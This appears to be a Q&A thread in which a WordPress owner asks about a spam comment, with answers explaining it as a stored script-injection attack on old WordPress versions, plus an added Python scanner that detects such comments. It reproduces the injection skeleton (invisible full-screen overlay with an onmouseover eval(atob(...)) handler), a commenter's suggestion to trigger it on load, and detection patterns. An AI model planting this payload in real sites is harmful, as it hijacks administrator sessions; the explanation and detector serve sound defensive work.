
I received an email from my WordPress site, where the comment section is disabled.

This was the email:

"Author: google (IP: 210.56.50.40, 210.56.50.40)

Email: guest@gmail.com

URL: http://spider.google.com

Who is?: http://whois.arin.net/rest/ip/210.56.50.40

Comment:

Welcome to WordPress. This is your first post.

[<a title="]" rel="nofollow"></a>[" <!-- style='position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999' onmouseover="eval(atob('[long base64-encoded payload removed]'))" &gt; --><a></a>]

Edit or delete it, then start blogging! "

What is this? I already deleted the comment, but I'm curious.

Asked by Joci93; edited by Peter Mortensen.

2 Answers

The "Code" is "patching" your WordPress installation (wp-comments-post.php) and sending some information to several servers (probably c&c). Also, it is removing itself from the database.

In other words, it is a hack. The email that you get is not from Google Official. It is from a Gmail account.

The decoded sources are here:

The exploit is based on WordPress 3.x persistent script injection: http://www.acunetix.com/vulnerabilities/web/wordpress-3-x-persistent-script-injection

Answered by Sacx; edited by Peter Mortensen.

This is a hacking attempt that contains a special combination of characters that hides the malicious payload code using Base64 encoding.

The hidden code relies on an older version of WordPress being used, like version 3.5 for example. In these older versions, there are tricks that have been found. These tricks fool the safeguards that try to prevent scripts from being inserted into comments. It is done using a carefully crafted combination of characters that are misinterpreted as shortcodes, HTML and text in a way that allows access to the mouseover JavaScript event.

TIP: KEEP WORDPRESS UPDATED TO THE LATEST VERSION

When the mouseover is triggered by someone logged in as an administrator, any malicious code in the comment is executed as if the administrator executed it.

Answered by Michal Koczwara; edited by Peter Mortensen.
    Why doesn't it use the `onload` event instead? Then you don't have to hope the administrator mouses over it. – Shelvacu Apr 26 '15 at 01:14
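The defender's side of what the second answer describes: a small scanner, added here as an example and not code from the question or from WordPress, that checks stored comment bodies for the indicators visible in the comment above (an inline event handler, a `]` inside an attribute value, an invisible full-screen overlay, and `eval(atob(...))` whose decoded payload looks like PHP). The regexes and both sample comments are constructed for this example; the malicious sample reuses the question's skeleton with a harmless base64 string.

```python
import base64
import re

# Indicators drawn from the comment shown in the question (constructed regexes, not WordPress code).
EVENT_HANDLER = re.compile(r"""\bon[a-z]+\s*=\s*["']""", re.I)       # onmouseover="..."
BRACKET_ATTR = re.compile(r"""\w+\s*=\s*"[\[\]]""")                  # title="]" shortcode/HTML confusion
OVERLAY = re.compile(r"position\s*:\s*fixed", re.I)
TRANSPARENT = re.compile(r"color\s*:\s*transparent", re.I)
DIMENSION_PX = re.compile(r"(?:width|height)\s*:\s*(\d+)px", re.I)
EVAL_ATOB = re.compile(r"""eval\s*\(\s*atob\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)""", re.I)
PHP_MARKERS = (b"<?php", b"fopen(", b"chmod(", b"eval(", b"base64_decode(")

# Constructed test input: the question's comment skeleton with a harmless base64 payload.
SAMPLE_PAYLOAD_B64 = base64.b64encode(b'<?php echo "constructed sample"; ?>').decode()
MALICIOUS_SAMPLE = (
    '[<a title="]" rel="nofollow"></a>[" <!-- style=\'position:fixed;top:0px;left:0px;'
    "width:6000px;height:6000px;color:transparent;z-index:999999999' "
    'onmouseover="eval(atob(\'' + SAMPLE_PAYLOAD_B64 + '\'))" &gt; --><a></a>]'
)
BENIGN_SAMPLE = 'Great post! I linked it from <a href="https://example.com/notes">my notes</a>.'

def decode_atob_payloads(comment: str) -> list[bytes]:
    """Base64-decode every eval(atob('...')) argument; invalid blobs are skipped."""
    decoded = []
    for match in EVAL_ATOB.finditer(comment):
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            decoded.append(base64.b64decode(blob, validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded

def scan_comment(comment: str) -> list[str]:
    """Return the names of the indicators a single comment body triggers."""
    hits = []
    if EVENT_HANDLER.search(comment):
        hits.append("inline-event-handler")
    if BRACKET_ATTR.search(comment):
        hits.append("bracket-in-attribute-value")
    # An invisible, fixed, oversized element is what makes the admin's mouseover unavoidable.
    if (OVERLAY.search(comment) and TRANSPARENT.search(comment)
            and any(int(px) >= 2000 for px in DIMENSION_PX.findall(comment))):
        hits.append("invisible-fullscreen-overlay")
    payloads = decode_atob_payloads(comment)
    if payloads:
        hits.append("eval-atob")
        if any(marker in payload for payload in payloads for marker in PHP_MARKERS):
            hits.append("decoded-payload-looks-like-php")
    return hits
```

Run `scan_comment` over each row of `wp_comments.comment_content` (or over the moderation emails) and alert on any hit; keeping WordPress current remains the actual fix, this only finds comments that already got in.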